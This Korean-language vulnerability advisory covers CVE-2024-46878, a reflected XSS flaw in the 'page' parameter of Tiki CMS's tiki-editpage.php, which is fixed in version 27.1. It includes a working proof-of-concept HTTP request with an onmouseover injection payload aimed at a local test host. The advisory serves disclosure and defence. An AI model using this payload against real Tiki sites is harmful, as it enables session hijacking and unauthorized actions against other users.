
CVE-2024-46878 - Tiki CMS 반사형 사이트 간 스크립팅 (XSS) 취약점
Tiki CMS - 'page' 매개변수 반사형 크로스 사이트 스크립팅(XSS) 취약점
교육, 연구 및 방어 목적으로만 사용하세요. 허가 없이 시스템을 무단 사용하는 것은 불법입니다.
Tiki 버전 26.3 및 이전 버전의 tiki-editpage.php에 있는 page 매개변수에 반사형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 이 취약점을 통해 공격자는 조작된 페이로드를 통해 임의의 JavaScript 코드를 실행할 수 있으며, 이로 인해 중요한 정보에 접근하거나 권한 없는 작업을 수행할 가능성이 있습니다.
이 취약점은 tiki-editpage.php의 page 매개변수에 대한 부적절한 입력 검증으로 인해 발생합니다. 사용자가 제공한 입력이 충분한 인코딩 없이 HTTP 응답에 반영되어 주입된 JavaScript가 실행될 수 있습니다.
인증된 공격자가 조작된 요청을 통해 다른 사용자의 브라우저에서 임의의 JavaScript를 실행할 수 있어, 세션 하이재킹 또는 권한 없는 작업이 발생할 수 있습니다.
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

이 문제는 Tiki CMS Groupware 버전 27.1에서 해결되었습니다. 사용자는 이 버전 또는 이후 패치 릴리스로 업그레이드하는 것이 좋습니다.